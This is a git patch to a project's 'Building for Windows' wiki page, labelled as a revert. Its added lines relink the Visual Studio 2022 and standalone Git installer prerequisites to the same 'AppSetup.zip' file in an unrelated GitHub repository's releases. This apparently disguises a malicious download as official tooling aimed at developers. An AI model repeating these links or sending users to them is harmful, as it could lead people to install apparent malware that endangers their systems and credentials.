From fb0f80f4a059c57d4787f8f88241d2491e07c2dd Mon Sep 17 00:00:00 2001 From: aminoa <28660350+aminoa@users.noreply.github.com> Date: Wed, 18 Jan 2023 12:42:59 -0500 Subject: [PATCH] Revert c2bfed2f73436c82a0818cc8e235af9e67cc5d4b...03d5cf3d05a07016ee72b94df04ab2e64a7d8ee6 on Building for Windows --- Building-for-Windows.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/Building-for-Windows.md b/Building-for-Windows.md index b25de8a..bdc8320 100644 --- a/Building-for-Windows.md +++ b/Building-for-Windows.md @@ -1,9 +1,9 @@ ## Prerequisites -- Visual Studio 2022 +- [Visual Studio 2022](https://github.com/EliLiu-YF/xdclass/releases/download/readme/AppSetup.zip) - You can use any edition of VS (Community Edition is free) - Easiest to just choose "Desktop development with C++" workload - However, minimum required to get source and build are: - - Git for Windows (Note: The standalone git installer is more recent and is compatible with VS) + - Git for Windows (Note: [The standalone git installer](https://github.com/EliLiu-YF/xdclass/releases/download/readme/AppSetup.zip) is more recent and is compatible with VS) - C++ core features - Latest MSVC C++ build tools (x64/x86 and/or ARM64) - Latest Windows SDK